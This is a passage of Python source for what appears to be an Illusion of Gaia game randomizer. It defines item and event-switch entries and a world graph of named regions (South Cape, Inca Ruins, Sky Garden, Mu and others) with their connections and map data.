146: [472, 2, False, 0, [64, 65, 66], "ce159", "Safe", b"\xb0\x02\xb0\x01\x83\x10\x23", b"\xe3", "Babel: Dark Space Top "],
# Jeweler's Mansion
147: [480, 1, False, 0, [], "1B083", "", "", "", "Jeweler's Mansion: Chest "],
# Mystic Statues
148: [101, 3, False, 0, [101, 102, 103, 104, 105], "", "", "", "", "Castoth Prize "],
149: [198, 3, False, 0, [100, 102, 103, 104, 105], "", "", "", "", "Viper Prize "],
150: [244, 3, False, 0, [100, 101, 103, 104, 105], "", "", "", "", "Vampires Prize "],
151: [302, 3, False, 0, [100, 101, 102, 104, 105], "", "", "", "", "Sand Fanger Prize "],
152: [448, 3, False, 0, [100, 101, 102, 103, 105], "", "", "", "", "Mummy Queen Prize "],
153: [479, 3, False, 0, [100, 101, 102, 103, 104], "", "", "", "", "Babel Prize "],
# Event Switches
500: [500, 4, True, 500, [], "", "", "", "", "Kara "],
501: [501, 4, True, 501, [], "", "", "", "", "Lilly "],
502: [502, 4, True, 502, [], "", "", "", "", "Moon Tribe: Spirits Healed "],
503: [503, 4, True, 503, [], "", "", "", "", "Inca: Castoth defeated "],
504: [504, 4, True, 504, [], "", "", "", "", "Freejia: Found Laborer "],
505: [505, 4, True, 505, [], "", "", "", "", "Neil's Memory Restored "],
506: [506, 4, True, 506, [], "", "", "", "", "Sky Garden: Map 82 NW Switch "],
507: [507, 4, True, 507, [], "", "", "", "", "Sky Garden: Map 82 NE Switch "],
508: [508, 4, True, 508, [], "", "", "", "", "Sky Garden: Map 82 SE Switch "],
509: [509, 4, True, 509, [], "", "", "", "", "Sky Garden: Map 84 Switch "],
510: [510, 4, True, 510, [], "", "", "", "", "Seaside: Fountain Purified "],
511: [511, 4, True, 511, [], "", "", "", "", "Mu: Water Lowered 1 "],
512: [512, 4, True, 512, [], "", "", "", "", "Mu: Water Lowered 2 "],
513: [513, 4, True, 513, [], "", "", "", "", "Angel: Puzzle Complete "],
514: [514, 4, True, 514, [], "", "", "", "", "Mt Kress: Drops used 1 "],
515: [515, 4, True, 515, [], "", "", "", "", "Mt Kress: Drops used 2 "],
516: [516, 4, True, 516, [], "", "", "", "", "Mt Kress: Drops used 3 "],
517: [517, 4, True, 517, [], "", "", "", "", "Pyramid: Hieroglyphs placed "],
518: [518, 4, True, 518, [], "", "", "", "", "Babel: Castoth defeated "],
519: [519, 4, True, 519, [], "", "", "", "", "Babel: Viper defeated "],
520: [520, 4, True, 520, [], "", "", "", "", "Babel: Vampires defeated "],
521: [521, 4, True, 521, [], "", "", "", "", "Babel: Sand Fanger defeated "],
522: [522, 4, True, 522, [], "", "", "", "", "Babel: Mummy Queen defeated "],
523: [523, 4, True, 523, [], "", "", "", "", "Mansion: Solid Arm defeated "],
# Misc
600: [600, 4, True, 600, [], "", "", "", "", "Freedan Access "],
601: [601, 4, True, 601, [], "", "", "", "", "Glitches "],
602: [602, 4, True, 602, [], "", "", "", "", "Early Firebird "],
603: [491, 4, True, 67, [], "", "", "", "", "Firebird "]
}
# World graph
# Format: { Region ID:
# Traversed_flag, [AccessibleRegions], type(0=other/misc,1=exterior,2=interior), [continentID,areaID,layer,MapID],
# 4: DS_access (0=no_access,1=any_DS,2=form_change_DS),
# 5: RegionName,
# 6: [ItemsToRemove],
# 7: ForceFormChange,
# 8: [AccessibleFromNodes],
# 9: [Accessible_DS_nodes],
# 10: [Accessible_Nodes_w_Logic],
# 11: [item_locations],
# 12: [origin_logic],
# 13: [dest_logic],
# 14: [origin_exits],
# 15: [dest_exits] }
self.graph = {
# Game Start
0: [False, [22], 0, [0,0,0,b"\x00"], 0, "Game Start", [], True, [], [], [], [], [], [], [], []],
# Jeweler
1: [False, [], 0, [0,0,0,b"\x00"], 0, "Jeweler Access", [], False, [], [], [], [], [], [], [], []],
2: [False, [], 0, [0,0,0,b"\x00"], 0, "Jeweler Reward 1", [], False, [], [], [], [], [], [], [], []],
3: [False, [], 0, [0,0,0,b"\x00"], 0, "Jeweler Reward 2", [], False, [], [], [], [], [], [], [], []],
4: [False, [], 0, [0,0,0,b"\x00"], 0, "Jeweler Reward 3", [], False, [], [], [], [], [], [], [], []],
5: [False, [], 0, [0,0,0,b"\x00"], 0, "Jeweler Reward 4", [], False, [], [], [], [], [], [], [], []],
6: [False, [], 0, [0,0,0,b"\x00"], 0, "Jeweler Reward 5", [], False, [], [], [], [], [], [], [], []],
7: [False, [], 0, [0,0,0,b"\x00"], 0, "Jeweler Reward 6", [], False, [], [], [], [], [], [], [], []],
8: [False, [], 0, [0,0,0,b"\x00"], 0, "Jeweler Reward 7", [], False, [], [], [], [], [], [], [], []],
# Overworld Menus
10: [False, [20,30,50,60,63], 0, [1,0,0,b"\x00"], 0, "Overworld: SW Continent", [], True, [], [], [], [], [], [], [], []],
11: [False, [102,110,133,160,162], 0, [2,0,0,b"\x00"], 0, "Overworld: SE Continent", [], True, [], [], [], [], [], [], [], []],
12: [False, [250,280,290], 0, [3,0,0,b"\x00"], 0, "Overworld: NE Continent", [], True, [], [], [], [], [], [], [], []],
13: [False, [310,330,350,360], 0, [4,0,0,b"\x00"], 0, "Overworld: N Continent", [], True, [], [], [], [], [], [], [], []],
14: [False, [400,410], 0, [5,0,0,b"\x00"], 0, "Overworld: NW Continent", [], True, [], [], [], [], [], [], [], []],
# Passage Menus
15: [False, [], 0, [0,0,0,b"\x00"], 0, "Passage: Seth", [], True, [], [], [], [], [], [], [], []],
16: [False, [], 0, [0,0,0,b"\x00"], 0, "Passage: Moon Tribe", [], True, [], [], [], [], [], [], [], []],
17: [False, [], 0, [0,0,0,b"\x00"], 0, "Passage: Neil", [], True, [], [], [], [], [], [], [], []],
# South Cape
20: [False, [1,10], 1, [1,1,0,b"\x00"], 0, "South Cape: Main Area", [], False, [], [], [], [], [], [], [], []],
21: [False, [20], 1, [1,1,0,b"\x00"], 0, "South Cape: School Roof", [], False, [], [], [], [], [], [], [], []],
22: [False, [], 2, [1,1,0,b"\x00"], 0, "South Cape: School", [], False, [], [], [], [], [], [], [], []],
23: [False, [], 2, [1,1,0,b"\x00"], 0, "South Cape: Will's House", [], False, [], [], [], [], [], [], [], []],
24: [False, [], 2, [1,1,0,b"\x00"], 0, "South Cape: East House", [], False, [], [], [], [], [], [], [], []],
25: [False, [], 2, [1,1,0,b"\x00"], 0, "South Cape: Seth's House", [], False, [], [], [], [], [], [], [], []],
26: [False, [], 2, [1,1,0,b"\x00"], 0, "South Cape: Lance's House", [], False, [], [], [], [], [], [], [], []],
27: [False, [], 2, [1,1,0,b"\x00"], 0, "South Cape: Erik's House", [], False, [], [], [], [], [], [], [], []],
28: [False, [], 2, [1,1,0,b"\x00"], 0, "South Cape: Seaside Cave", [], False, [], [], [], [], [], [], [], []],
# Edward's / Prison
30: [False, [10], 1, [1,2,0,b"\x00"], 0, "Edward's Castle: Main Area", [], False, [], [], [], [], [], [], [], []],
31: [False, [30], 1, [1,2,0,b"\x00"], 0, "Edward's Castle: Behind Guard", [], False, [], [], [], [], [], [], [], []],
32: [False, [], 2, [1,2,0,b"\x00"], 0, "Edward's Prison: Will's Cell", [2], False, [], [], [], [], [], [], [], []],
33: [False, [], 2, [1,2,0,b"\x00"], 0, "Edward's Prison: Prison Main", [2], False, [], [], [], [], [], [], [], []],
# Underground Tunnel
40: [False, [], 2, [1,2,0,b"\x00"], 0, "Underground Tunnel: Map 12", [], False, [], [], [], [], [], [], [], []],
41: [False, [], 2, [1,2,0,b"\x00"], 0, "Underground Tunnel: Map 13", [], False, [], [], [], [], [], [], [], []],
42: [False, [], 2, [1,2,0,b"\x00"], 0, "Underground Tunnel: Map 14", [], False, [], [], [], [], [], [], [], []],
43: [False, [], 2, [1,2,0,b"\x00"], 0, "Underground Tunnel: Map 15", [], False, [], [], [], [], [], [], [], []],
44: [False, [], 2, [1,2,0,b"\x00"], 0, "Underground Tunnel: Map 16", [], False, [], [], [], [], [], [], [], []],
45: [False, [], 2, [1,2,0,b"\x00"], 0, "Underground Tunnel: Map 17 (entrance)", [], False, [], [], [], [], [], [], [], []],
46: [False, [45], 2, [1,2,0,b"\x00"], 0, "Underground Tunnel: Map 17 (exit open)", [], False, [], [], [], [], [], [], [], []],
47: [False, [], 2, [1,2,0,b"\x00"], 0, "Underground Tunnel: Map 18 (before bridge)", [], False, [], [], [], [], [], [], [], []],
48: [False, [], 2, [1,2,0,b"\x00"], 0, "Underground Tunnel: Map 18 (after bridge)", [], False, [], [], [], [], [], [], [], []],
49: [False, [], 2, [1,2,0,b"\x00"], 0, "Underground Tunnel: Exit", [], True, [], [], [], [], [], [], [], []],
# Itory
50: [False, [10], 1, [1,3,0,b"\x00"], 0, "Itory: Entrance", [9], False, [], [], [], [], [], [], [], []],
51: [False, [50], 1, [1,3,0,b"\x00"], 0, "Itory: Main Area", [], False, [], [], [], [], [], [], [], []],
52: [False, [], 1, [1,3,0,b"\x00"], 0, "Itory: Lilly's Back Porch", [], False, [], [], [], [], [], [], [], []],
53: [False, [], 2, [1,3,0,b"\x00"], 0, "Itory: West House", [], False, [], [], [], [], [], [], [], []],
54: [False, [], 2, [1,3,0,b"\x00"], 0, "Itory: North House", [], False, [], [], [], [], [], [], [], []],
55: [False, [], 2, [1,3,0,b"\x00"], 0, "Itory: Lilly's House", [23], False, [], [], [], [], [], [], [], []],
56: [False, [], 2, [1,3,0,b"\x00"], 0, "Itory: Cave", [], False, [], [], [], [], [], [], [], []],
57: [False, [56], 2, [1,3,0,b"\x00"], 0, "Itory: Cave (behind false wall)", [], False, [], [], [], [], [], [], [], []],
58: [False, [], 2, [1,3,0,b"\x00"], 0, "Itory: Cave (secret room)", [], False, [], [], [], [], [], [], [], []],
59: [False, [55,501], 0, [1,3,0,b"\x00"], 0, "Itory: Got Lilly", [], False, [], [], [], [], [], [], [], []],
# Moon Tribe / Inca Entrance
60: [False, [10], 1, [1,4,0,b"\x00"], 0, "Moon Tribe: Main Area", [25], False, [], [], [], [], [], [], [], []],
61: [False, [], 2, [1,4,0,b"\x00"], 0, "Moon Tribe: Cave", [], False, [], [], [], [], [], [], [], []],
62: [False, [61], 2, [1,4,0,b"\x00"], 0, "Moon Tribe: Cave (Pedestal)", [], False, [], [], [], [], [], [], [], []],
63: [False, [10], 1, [1,5,0,b"\x00"], 0, "Inca: Entrance", [], False, [], [], [], [], [], [], [], []],
64: [False, [60,502], 0, [1,4,0,b"\x00"], 0, "Moon Tribe: Spirits Awake", [], False, [], [], [], [], [], [], [], []],
# Inca Ruins
70: [False, [], 2, [1,5,0,b"\x00"], 0, "Inca: Map 29 (NE)", [], False, [], [], [], [], [], [], [], []],
71: [False, [], 2, [1,5,0,b"\x00"], 0, "Inca: Map 29 (NW)", [], False, [], [], [], [], [], [], [], []],
72: [False, [70,73], 2, [1,5,0,b"\x00"], 0, "Inca: Map 29 (N)", [], False, [], [], [], [], [], [], [], []],
73: [False, [], 2, [1,5,0,b"\x00"], 0, "Inca: Map 29 (center)", [], False, [], [], [], [], [], [], [], []],
74: [False, [72], 2, [1,5,0,b"\x00"], 0, "Inca: Map 29 (SW)", [], False, [], [], [], [], [], [], [], []],
75: [False, [72,99], 2, [1,5,0,b"\x00"], 0, "Inca: Map 29 (SE)", [], False, [], [], [], [], [], [], [], []],
76: [False, [], 2, [1,5,0,b"\x00"], 0, "Inca: Map 29 (statue head)", [], False, [], [], [], [], [], [], [], []],
77: [False, [], 2, [1,5,0,b"\x00"], 0, "Inca: Map 30 (first area)", [3, 4], False, [], [], [], [], [], [], [], []],
78: [False, [77], 2, [1,5,0,b"\x00"], 0, "Inca: Map 30 (second area)", [], False, [], [], [], [], [], [], [], []],
79: [False, [], 2, [1,5,0,b"\x00"], 0, "Inca: Map 31", [], False, [], [], [], [], [], [], [], []],
80: [False, [], 2, [1,5,0,b"\x00"], 0, "Inca: Map 32 (entrance)", [], False, [], [], [], [], [], [], [], []],
81: [False, [], 2, [1,5,0,b"\x00"], 0, "Inca: Map 32 (behind statue)", [], False, [], [], [], [], [], [], [], []],
82: [False, [83], 2, [1,5,0,b"\x00"], 0, "Inca: Map 33 (entrance)", [], False, [], [], [], [], [], [], [], []],
83: [False, [82], 2, [1,5,0,b"\x00"], 0, "Inca: Map 33 (over ramp)", [], False, [], [], [], [], [], [], [], []], # Need to prevent softlocks here
84: [False, [], 2, [1,5,0,b"\x00"], 0, "Inca: Map 34", [], False, [], [], [], [], [], [], [], []],
85: [False, [], 2, [1,5,0,b"\x00"], 0, "Inca: Map 35 (entrance)", [], False, [], [], [], [], [], [], [], []],
86: [False, [85], 2, [1,5,0,b"\x00"], 0, "Inca: Map 35 (over ramp)", [], False, [], [], [], [], [], [], [], []],
87: [False, [], 2, [1,5,0,b"\x00"], 0, "Inca: Map 36 (main)", [8], False, [], [], [], [], [], [], [], []],
88: [False, [87], 2, [1,5,0,b"\x00"], 0, "Inca: Map 36 (exit opened)", [], False, [], [], [], [], [], [], [], []],
89: [False, [], 2, [1,5,0,b"\x00"], 0, "Inca: Map 37 (main area)", [7], False, [], [], [], [], [], [], [], []],
90: [False, [], 2, [1,5,0,b"\x00"], 0, "Inca: Map 37 (tile bridge)", [], False, [], [], [], [], [], [], [], []], # Check for potential softlock?
91: [False, [], 2, [1,5,0,b"\x00"], 0, "Inca: Map 38 (south section)", [], False, [], [], [], [], [], [], [], []],
92: [False, [91], 2, [1,5,0,b"\x00"], 0, "Inca: Map 38 (behind statues)", [], False, [], [], [], [], [], [], [], []],
93: [False, [], 2, [1,5,0,b"\x00"], 0, "Inca: Map 38 (north section)", [], False, [], [], [], [], [], [], [], []],
94: [False, [], 2, [1,5,0,b"\x00"], 0, "Inca: Map 39", [], False, [], [], [], [], [], [], [], []],
95: [False, [96], 2, [1,5,0,b"\x00"], 0, "Inca: Map 40 (entrance)", [], False, [], [], [], [], [], [], [], []],
96: [False, [95], 2, [1,5,0,b"\x00"], 0, "Inca: Map 40 (past tiles)", [], False, [], [], [], [], [], [], [], []],
97: [False, [98,503], 2, [1,5,0,b"\x00"], 0, "Inca: Boss Room", [], True, [], [], [], [], [], [], [], []], # might need to add an exit for this
98: [False, [97], 2, [1,5,0,b"\x00"], 0, "Inca: Behind Boss Room", [], False, [], [], [], [], [], [], [], []],
99: [False, [], 2, [1,5,0,b"\x00"], 0, "Inca: Map 29 (SE door)", [], False, [], [], [], [], [], [], [], []],
# Gold Ship / Diamond Coast
100: [False, [104], 1, [1,5,0,b"\x00"], 0, "Gold Ship: Deck", [], False, [], [], [], [], [], [], [], []],
101: [False, [], 2, [1,5,0,b"\x00"], 0, "Gold Ship: Interior", [], False, [], [], [], [], [], [], [], []],
102: [False, [11], 1, [2,6,0,b"\x00"], 0, "Diamond Coast: Main Area", [], False, [], [], [], [], [], [], [], []],
103: [False, [], 2, [2,6,0,b"\x00"], 0, "Diamond Coast: House", [], False, [], [], [], [], [], [], [], []],
104: [False, [], 0, [1,5,0,b"\x00"], 0, "Gold Ship: Crow's Nest Passage", [], False, [], [], [], [], [], [], [], []],
# Freejia
110: [False, [11], 1, [2,7,0,b"\x00"], 0, "Freejia: Main Area", [], False, [], [], [], [], [], [], [], []],
111: [False, [1, 110], 1, [2,7,0,b"\x00"], 0, "Freejia: 2-story House Roof", [], False, [], [], [], [], [], [], [], []],
112: [False, [], 1, [2,7,0,b"\x00"], 0, "Freejia: Laborer House Roof", [], False, [], [], [], [], [], [], [], []],
113: [False, [110, 114], 1, [2,7,0,b"\x00"], 0, "Freejia: Labor Trade Roof", [], False, [], [], [], [], [], [], [], []],
114: [False, [110, 112], 1, [2,7,0,b"\x00"], 0, "Freejia: Back Alley", [], False, [], [], [], [], [], [], [], []],
115: [False, [110], 0, [2,7,0,b"\x00"], 0, "Freejia: Slaver", [], False, [], [], [], [], [], [], [], []],
116: [False, [], 2, [2,7,0,b"\x00"], 0, "Freejia: West House", [], False, [], [], [], [], [], [], [], []],
117: [False, [], 2, [2,7,0,b"\x00"], 0, "Freejia: 2-story House", [], False, [], [], [], [], [], [], [], []],
118: [False, [], 2, [2,7,0,b"\x00"], 0, "Freejia: Lovers' House", [], False, [], [], [], [], [], [], [], []],
119: [False, [], 2, [2,7,0,b"\x00"], 0, "Freejia: Hotel (common area)", [], False, [], [], [], [], [], [], [], []],
120: [False, [], 2, [2,7,0,b"\x00"], 0, "Freejia: Hotel (west room)", [], False, [], [], [], [], [], [], [], []],
121: [False, [], 2, [2,7,0,b"\x00"], 0, "Freejia: Hotel (east room)", [], False, [], [], [], [], [], [], [], []],
122: [False, [504], 2, [2,7,0,b"\x00"], 0, "Freejia: Laborer House", [], False, [], [], [], [], [], [], [], []],
123: [False, [], 2, [2,7,0,b"\x00"], 0, "Freejia: Messy House", [], False, [], [], [], [], [], [], [], []],
124: [False, [], 2, [2,7,0,b"\x00"], 0, "Freejia: Erik House", [], False, [], [], [], [], [], [], [], []],
125: [False, [], 2, [2,7,0,b"\x00"], 0, "Freejia: Dark Space House", [], False, [], [], [], [], [], [], [], []],
126: [False, [], 2, [2,7,0,b"\x00"], 0, "Freejia: Labor Trade House", [], False, [], [], [], [], [], [], [], []],
127: [False, [], 2, [2,7,0,b"\x00"], 0, "Freejia: Labor Market", [], False, [], [], [], [], [], [], [], []],
# Diamond Mine
130: [False, [131], 2, [2,8,0,b"\x00"], 0, "Diamond Mine: Map 61 (entrance)", [], False, [], [], [], [], [], [], [], []],
131: [False, [], 2, [2,8,0,b"\x00"], 0, "Diamond Mine: Map 61 (behind barriers)", [], False, [], [], [], [], [], [], [], []],
132: [False, [131], 2, [2,8,0,b"\x00"], 0, "Diamond Mine: Map 61 (false wall)", [], False, [], [], [], [], [], [], [], []],
133: [False, [11], 2, [2,8,0,b"\x00"], 0, "Diamond Mine: Map 62", [], False, [], [], [], [], [], [], [], []],
134: [False, [], 2, [2,8,0,b"\x00"], 0, "Diamond Mine: Map 63 (main)", [], False, [], [], [], [], [], [], [], []],
135: [False, [134], 2, [2,8,0,b"\x00"], 0, "Diamond Mine: Map 63 (elevator)", [], False, [], [], [], [], [], [], [], []],
136: [False, [], 2, [2,8,0,b"\x00"], 0, "Diamond Mine: Map 64 (main)", [], False, [], [], [], [], [], [], [], []],
137: [False, [136], 2, [2,8,0,b"\x00"], 0, "Diamond Mine: Map 64 (trapped laborer)", [], False, [], [], [], [], [], [], [], []],
138: [False, [], 2, [2,8,0,b"\x00"], 0, "Diamond Mine: Map 65 (main)", [], False, [], [], [], [], [], [], [], []],
139: [False, [138], 2, [2,8,0,b"\x00"], 0, "Diamond Mine: Map 65 (behind ramp)", [], False, [], [], [], [], [], [], [], []],
140: [False, [], 2, [2,8,0,b"\x00"], 0, "Diamond Mine: Map 66 (elevator 1)", [], False, [], [], [], [], [], [], [], []],
141: [False, [], 2, [2,8,0,b"\x00"], 0, "Diamond Mine: Map 66 (elevator 2)", [], False, [], [], [], [], [], [], [], []],
142: [False, [], 2, [2,8,0,b"\x00"], 0, "Diamond Mine: Map 66 (Dark Space)", [], False, [], [], [], [], [], [], [], []],
143: [False, [], 2, [2,8,0,b"\x00"], 0, "Diamond Mine: Map 66 (laborer)", [], False, [], [], [], [], [], [], [], []],
144: [False, [145], 2, [2,8,0,b"\x00"], 0, "Diamond Mine: Map 67 (entrance)", [], False, [], [], [], [], [], [], [], []],
145: [False, [144], 2, [2,8,0,b"\x00"], 0, "Diamond Mine: Map 67 (exit)", [], False, [], [], [], [], [], [], [], []], # potential softlock?
146: [False, [], 2, [2,8,0,b"\x00"], 0, "Diamond Mine: Map 68 (main)", [], False, [], [], [], [], [], [], [], []],
147: [False, [146], 2, [2,8,0,b"\x00"], 0, "Diamond Mine: Map 68 (door open)", [], False, [], [], [], [], [], [], [], []],
148: [False, [], 2, [2,8,0,b"\x00"], 0, "Diamond Mine: Map 69", [], False, [], [], [], [], [], [], [], []],
149: [False, [], 2, [2,8,0,b"\x00"], 0, "Diamond Mine: Map 70", [], False, [], [], [], [], [], [], [], []],
150: [False, [], 2, [2,8,0,b"\x00"], 0, "Diamond Mine: Map 71", [], False, [], [], [], [], [], [], [], []],
# Neil's Cottage / Nazca
160: [False, [11], 2, [2,9,0,b"\x00"], 0, "Neil's Cottage", [13], False, [], [], [], [], [], [], [], []],
161: [False, [17,160,505], 2, [2,9,0,b"\x00"], 0, "Neil's Cottage: Neil", [], False, [], [], [], [], [], [], [], []],
162: [False, [11], 1, [2,10,0,b"\x00"], 0, "Nazca Plain", [], False, [], [], [], [], [], [], [], []],
# Sky Garden
167: [False, [], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 83 (SE)", [], False, [], [], [], [], [], [], [], []],
168: [False, [181], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 81 (north)", [], False, [], [], [], [], [], [], [], []],
169: [False, [], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 86 (DS Room)", [], False, [], [], [], [], [], [], [], []],
170: [False, [], 1, [2,10,0,b"\x00"], 0, "Sky Garden: Foyer", [14, 14, 14, 14], False, [], [], [], [], [], [], [], []],
171: [False, [], 1, [2,10,0,b"\x00"], 0, "Sky Garden: Boss Entrance", [], False, [], [], [], [], [], [], [], []],
172: [False, [], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 77 (main)", [], False, [], [], [], [], [], [], [], []],
173: [False, [], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 77 (SW)", [], False, [], [], [], [], [], [], [], []],
174: [False, [], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 77 (SE)", [], False, [], [], [], [], [], [], [], []],
175: [False, [], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 78", [], False, [], [], [], [], [], [], [], []],
176: [False, [], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 79 (main)", [], False, [], [], [], [], [], [], [], []],
177: [False, [], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 79 (center)", [], False, [], [], [], [], [], [], [], []],
178: [False, [], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 79 (behind barrier)", [], False, [], [], [], [], [], [], [], []],
179: [False, [], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 80 (north)", [], False, [], [], [], [], [], [], [], []],
180: [False, [], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 80 (south)", [], False, [], [], [], [], [], [], [], []],
181: [False, [168], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 81 (main)", [], False, [], [], [], [], [], [], [], []],
182: [False, [181], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 81 (west)", [], False, [], [], [], [], [], [], [], []],
183: [False, [182], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 81 (Dark Space cage)", [], False, [], [], [], [], [], [], [], []],
184: [False, [182], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 81 (SE platform)", [], False, [], [], [], [], [], [], [], []],
185: [False, [182], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 81 (SW platform)", [], False, [], [], [], [], [], [], [], []],
186: [False, [506], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 82 (north)", [], False, [], [], [], [], [], [], [], []], # deal with switches
187: [False, [508], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 82 (south)", [], False, [], [], [], [], [], [], [], []],
188: [False, [], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 82 (NE)", [], False, [], [], [], [], [], [], [], []],
189: [False, [188,507], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 82 (switch cage)", [], False, [], [], [], [], [], [], [], []],
190: [False, [191], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 83 (NE)", [], False, [], [], [], [], [], [], [], []],
191: [False, [190, 192], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 83 (NW)", [], False, [], [], [], [], [], [], [], []],
192: [False, [], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 83 (center)", [], False, [], [], [], [], [], [], [], []],
193: [False, [194], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 83 (SW)", [], False, [], [], [], [], [], [], [], []],
194: [False, [167], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 83 (chests)", [], False, [], [], [], [], [], [], [], []],
195: [False, [196], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 84 (main)", [], False, [], [], [], [], [], [], [], []],
196: [False, [], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 84 (NE)", [], False, [], [], [], [], [], [], [], []],
197: [False, [], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 84 (behind statue)", [], False, [], [], [], [], [], [], [], []],
198: [False, [], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Boss Room", [], True, [], [], [], [], [], [], [], []],
199: [False, [197,509], 2, [2,10,0,b"\x00"], 0, "Sky Garden: Map 84 (statue)", [], False, [], [], [], [], [], [], [], []],
# Seaside Palace
200: [False, [], 2, [3,11,0,b"\x00"], 0, "Seaside Palace: Area 1", [16], False, [], [], [], [], [], [], [], []],
201: [False, [200], 2, [3,11,0,b"\x00"], 0, "Seaside Palace: Area 1 (door unlocked)", [], False, [], [], [], [], [], [], [], []],
202: [False, [], 2, [3,11,0,b"\x00"], 0, "Seaside Palace: Area 1 NE Room", [], False, [], [], [], [], [], [], [], []],
203: [False, [], 2, [3,11,0,b"\x00"], 0, "Seaside Palace: Area 1 NW Room", [], False, [], [], [], [], [], [], [], []],
204: [False, [], 2, [3,11,0,b"\x00"], 0, "Seaside Palace: Area 1 SE Room", [], False, [], [], [], [], [], [], [], []],
205: [False, [], 2, [3,11,0,b"\x00"], 0, "Seaside Palace: Area 2", [], False, [], [], [], [], [], [], [], []],
206: [False, [200], 2, [3,11,0,b"\x00"], 0, "Seaside Palace: Buffy", [], False, [], [], [], [], [], [], [], []],
207: [False, [], 2, [3,11,0,b"\x00"], 0, "Seaside Palace: Area 2 SW Room", [], False, [], [], [], [], [], [], [], []],
208: [False, [205], 2, [3,11,0,b"\x00"], 0, "Seaside Palace: Coffin", [], False, [], [], [], [], [], [], [], []],
209: [False, [], 2, [3,11,0,b"\x00"], 0, "Seaside Palace: Fountain", [17], False, [], [], [], [], [], [], [], []],
210: [False, [], 2, [3,11,0,b"\x00"], 0, "Seaside Palace: Mu Passage", [16], False, [], [], [], [], [], [], [], []],
211: [False, [210], 2, [3,11,0,b"\x00"], 0, "Seaside Palace: Mu Passage (door unlocked)", [], False, [], [], [], [], [], [], [], []],
# Mu
212: [False, [], 2, [3,12,0,b"\x00"], 0, "Mu: Map 95 (top)", [], False, [], [], [], [], [], [], [], []],
213: [False, [212], 2, [3,12,1,b"\x00"], 0, "Mu: Map 95 (middle E)", [], False, [], [], [], [], [], [], [], []],
214: [False, [], 2, [3,12,1,b"\x00"], 0, "Mu: Map 95 (middle W)", [], False, [], [], [], [], [], [], [], []],
215: [False, [213], 2, [3,12,2,b"\x00"], 0, "Mu: Map 95 (bottom E)", [], False, [], [], [], [], [], [], [], []],
216: [False, [214], 2, [3,12,2,b"\x00"], 0, "Mu: Map 95 (bottom W)", [], False, [], [], [], [], [], [], [], []],
217: [False, [], 2, [3,12,0,b"\x00"], 0, "Mu: Map 96 (top)", [], False, [], [], [], [], [], [], [], []],
218: [False, [217], 2, [3,12,1,b"\x00"], 0, "Mu: Map 96 (middle)", [], False, [], [], [], [], [], [], [], []],
219: [False, [], 2, [3,12,2,b"\x00"], 0, "Mu: Map 96 (bottom)", [], False, [], [], [], [], [], [], [], []],
220: [False, [], 2, [3,12,0,b"\x00"], 0, "Mu: Map 97 (top main)", [], False, [], [], [], [], [], [], [], []],
221: [False, [222, 223], 2, [3,12,0,b"\x00"], 0, "Mu: Map 97 (top island)", [], False, [], [], [], [], [], [], [], []],
222: [False, [], 2, [3,12,1,b"\x00"], 0, "Mu: Map 97 (middle NE)", [], False, [], [], [], [], [], [], [], []],
223: [False, [221], 2, [3,12,1,b"\x00"], 0, "Mu: Map 97 (middle SW)", [], False, [], [], [], [], [], [], [], []],
224: [False, [], 2, [3,12,2,b"\x00"], 0, "Mu: Map 97 (bottom)", [], False, [], [], [], [], [], [], [], []],
225: [False, [], 2, [3,12,0,b"\x00"], 0, "Mu: Map 98 (top S)", [], False, [], [], [], [], [], [], [], []],
226: [False, [], 2, [3,12,0,b"\x00"], 0, "Mu: Map 98 (top N)", [], False, [], [], [], [], [], [], [], []],
227: [False, [226], 2, [3,12,1,b"\x00"], 0, "Mu: Map 98 (middle E)", [], False, [], [], [], [], [], [], [], []],
228: [False, [], 2, [3,12,1,b"\x00"], 0, "Mu: Map 98 (middle W)", [], False, [], [], [], [], [], [], [], []],
229: [False, [227], 2, [3,12,2,b"\x00"], 0, "Mu: Map 98 (bottom E)", [], False, [], [], [], [], [], [], [], []],
230: [False, [228], 2, [3,12,2,b"\x00"], 0, "Mu: Map 98 (bottom W)", [], False, [], [], [], [], [], [], [], []],
231: [False, [], 2, [3,12,0,b"\x00"], 0, "Mu: Map 99 (Room of Hope 1)", [18], False, [], [], [], [], [], [], [], []],
232: [False, [], 2, [3,12,0,b"\x00"], 0, "Mu: Map 99 (Room of Hope 2)", [18], False, [], [], [], [], [], [], [], []],
233: [False, [], 2, [3,12,1,b"\x00"], 0, "Mu: Map 100 (middle E)", [], False, [], [], [], [], [], [], [], []],
234: [False, [], 2, [3,12,1,b"\x00"], 0, "Mu: Map 100 (middle W)", [], False, [], [], [], [], [], [], [], []],
235: [False, [], 2, [3,12,2,b"\x00"], 0, "Mu: Map 100 (bottom)", [], False, [], [], [], [], [], [], [], []],
236: [False, [], 2, [3,12,0,b"\x00"], 0, "Mu: Map 101 (top)", [], False, [], [], [], [], [], [], [], []],
